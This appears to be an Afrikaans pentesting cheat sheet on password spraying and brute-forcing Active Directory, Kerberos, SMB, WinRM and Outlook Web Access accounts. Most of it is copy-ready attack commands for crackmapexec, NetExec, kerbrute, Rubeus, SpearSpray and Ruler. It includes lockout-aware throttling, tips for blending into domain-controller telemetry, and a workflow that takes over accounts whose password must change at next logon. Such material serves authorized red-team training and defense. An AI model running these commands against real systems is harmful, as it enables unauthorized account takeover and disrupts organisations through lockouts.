Password Spraying / Brute Force

Reading time: 10 minutes

Password Spraying

Sodra jy verskeie valid usernames gevind het, kan jy die mees common passwords probeer (hou in gedagte die password policy van die omgewing) met elkeen van die ontdekte gebruikers.
Standaard is die minimum password length 7.

Lyste van common usernames kan ook nuttig wees: https://github.com/insidetrust/statistically-likely-usernames

Neem kennis dat jy sommige accounts kan lockout as jy verskeie verkeerde passwords probeer (by default meer as 10).

Kry password policy

As jy user credentials of 'n shell as 'n domain user het, kan jy get the password policy with:

# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" #From powerview

Uitbuiting vanaf Linux (of almal)

• Gebruik crackmapexec:

crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +

• Gebruik NetExec (CME successor) vir geteikende, lae-gedruis spraying oor SMB/WinRM:

# Optional: generate a hosts entry to ensure Kerberos FQDN resolution
netexec smb <DC_IP> --generate-hosts-file hosts && cat hosts /etc/hosts | sudo sponge /etc/hosts

# Spray a single candidate password against harvested users over SMB
netexec smb <DC_FQDN> -u users.txt -p 'Password123!' \
--continue-on-success --no-bruteforce --shares

# Validate a hit over WinRM (or use SMB exec methods)
netexec winrm <DC_FQDN> -u <username> -p 'Password123!' -x "whoami"

# Tip: sync your clock before Kerberos-based auth to avoid skew issues
sudo ntpdate <DC_FQDN>

• Deur kerbrute te gebruik (Go)

# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman

• spray (jy kan die aantal pogings aandui om rekeningvergrendelings te voorkom):

spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>

• Gebruik kerbrute (python) - nie aanbeveel nie — soms werk dit nie

python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt

• Met die scanner/smb/smb_login module van Metasploit:

• Gebruik rpcclient:

# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done

Vanaf Windows

• Met Rubeus weergawe met brute-module:

# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>

• With Invoke-DomainPasswordSpray (Dit kan standaard gebruikers uit die domein genereer en dit sal die wagwoordbeleid van die domein haal en pogings ooreenkomstig daaraan beperk):

Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose

• Met Invoke-SprayEmptyPassword.ps1

Invoke-SprayEmptyPassword

Identifiseer en Oorneem "Password must change at next logon" Rekeninge (SAMR)

'n lae‑ruis tegniek is om 'n onskadelike/leë password te spray en rekeninge te vang wat STATUS_PASSWORD_MUST_CHANGE teruggee, wat aandui dat die password gedwing verval is en sonder om die ou een te ken verander kan word.

Workflow:

• Enumereer gebruikers (RID brute via SAMR) om die teikenlys op te bou:

rpcclient enumeration

# NetExec (null/guest) + RID brute to harvest users
netexec smb <dc_fqdn> -u '' -p '' --rid-brute | awk -F'\\\\| ' '/SidTypeUser/ {print $3}' > users.txt

• Spray 'n leë password en gaan voort met hits om accounts te vang wat by next logon moet verander:

# Will show valid, lockout, and STATUS_PASSWORD_MUST_CHANGE among results
netexec smb <DC.FQDN> -u users.txt -p '' --continue-on-success

• Vir elke treffer, verander die wagwoord oor SAMR met NetExec se module (geen ou wagwoord benodig wanneer "must change" gestel is):

# Strong complexity to satisfy policy
env NEWPASS='P@ssw0rd!2025#' ; \
netexec smb <DC.FQDN> -u <User> -p '' -M change-password -o NEWPASS="$NEWPASS"

# Validate and retrieve domain password policy with the new creds
netexec smb <DC.FQDN> -u <User> -p "$NEWPASS" --pass-pol

Operasionele notas:

• Maak seker jou gasheerklok is gesinkroniseer met die DC voor Kerberos-based operations: sudo ntpdate <dc_fqdn>.
• 'n [+] sonder (Pwn3d!) in sekere modules (bv., RDP/WinRM) beteken die creds is geldig maar die rekening het nie interactive logon rights nie.

Brute Force

legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org

Kerberos pre-auth spraying with LDAP targeting and PSO-aware throttling (SpearSpray)

Kerberos pre-auth–based spraying verminder geraas teenoor SMB/NTLM/LDAP bind-pogings en stem beter ooreen met AD se lockout-beleid. SpearSpray koppel LDAP-gedrewe targeting, 'n patroon-enjin, en beleidsbewustheid (domain policy + PSOs + badPwdCount buffer) om presies en veilig te spray. Dit kan ook compromised principals in Neo4j merk vir BloodHound pathing.

Sleutelidees:

• LDAP-gebruikersontdekking met paginering en LDAPS-ondersteuning, opsioneel met aangepaste LDAP-filters.
• Domein lockout-beleid + PSO-bewuste filtering om 'n konfigureerbare pogingbuffer (drempel) te laat en te voorkom dat gebruikersrekeninge vergrendel word.
• Kerberos pre-auth-validasie met vinnige gssapi-bindings (genereer 4768/4771 op DCs in plaas van 4625).
• Patroongebaseerde, per-gebruiker wagwoordgenerering met veranderlikes soos name en tydwaardes afgelei van elke gebruiker se pwdLastSet.
• Beheer van throughput met threads, jitter en maksimum versoeke per sekonde.
• Opsionele Neo4j-integrasie om owned users te merk vir BloodHound.

Basiese gebruik en ontdekking:

# List available pattern variables
spearspray -l

# Basic run (LDAP bind over TCP/389)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local

# LDAPS (TCP/636)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local --ssl

Teiken- en patroonbeheer:

# Custom LDAP filter (e.g., target specific OU/attributes)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local \
-q "(&(objectCategory=person)(objectClass=user)(department=IT))"

# Use separators/suffixes and an org token consumed by patterns via {separator}/{suffix}/{extra}
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -sep @-_ -suf !? -x ACME

Stealth en veiligheidskontroles:

# Control concurrency, add jitter, and cap request rate
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -t 5 -j 3,5 --max-rps 10

# Leave N attempts in reserve before lockout (default threshold: 2)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -thr 2

Neo4j/BloodHound verryking:

spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -nu neo4j -np bloodhound --uri bolt://localhost:7687

Oorsig van die patroonstelsel (patterns.txt):

# Example templates consuming per-user attributes and temporal context
{name}{separator}{year}{suffix}
{month_en}{separator}{short_year}{suffix}
{season_en}{separator}{year}{suffix}
{samaccountname}
{extra}{separator}{year}{suffix}

Beskikbare veranderlikes sluit in:

• {name}, {samaccountname}
• Temporal from each user’s pwdLastSet (or whenCreated): {year}, {short_year}, {month_number}, {month_en}, {season_en}
• Composition helpers and org token: {separator}, {suffix}, {extra}

Operasionele notas:

• Gee voorkeur aan om die PDC-emulator met -dc te bevraagteken om die mees gesaghebbende badPwdCount en beleidsverwante inligting te lees.
• badPwdCount-herstellings word geaktiveer by die volgende poging na die waarnemingsvenster; gebruik drempel en tydsberekening om veilig te bly.
• Kerberos pre-auth-pogings verskyn as 4768/4771 in DC-telemetrie; gebruik jitter en rate-limiting om in te meng.

Wenk: SpearSpray’s default LDAP page size is 200; adjust with -lps as needed.

Outlook Web Access

Daar is verskeie gereedskap vir password spraying outlook.

• Met MSF Owa_login
• Met MSF Owa_ews_login
• Met Ruler (betroubaar!)
• Met DomainPasswordSpray (Powershell)
• Met MailSniper (Powershell)

Om enige van hierdie gereedskap te gebruik, het jy 'n gebruikerslys en 'n password / 'n klein lys passwords nodig om te spray.

./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020

Google

• https://github.com/ustayready/CredKing/blob/master/credking.py

Okta

• https://github.com/ustayready/CredKing/blob/master/credking.py
• https://github.com/Rhynorater/Okta-Password-Sprayer
• https://github.com/knavesec/CredMaster

Verwysings

• https://github.com/sikumy/spearspray
• https://github.com/TarlogicSecurity/kerbrute
• https://github.com/Greenwolf/Spray
• https://github.com/Hackndo/sprayhound
• https://github.com/login-securite/conpass
• https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying
• https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell
• www.blackhillsinfosec.com/?p=5296
• https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying
• HTB Sendai – 0xdf: from spray to gMSA to DA/SYSTEM
• HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin